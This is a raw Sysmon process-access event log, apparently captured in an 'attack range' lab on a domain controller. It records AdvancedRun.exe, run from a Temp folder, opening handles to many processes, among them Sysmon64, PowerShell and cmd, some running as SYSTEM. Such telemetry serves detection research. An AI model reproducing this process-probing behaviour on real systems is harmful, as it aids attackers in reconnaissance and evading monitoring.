20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.577{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.576{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.576{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.575{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.574{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.572{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.571{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.571{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.571{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.571{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 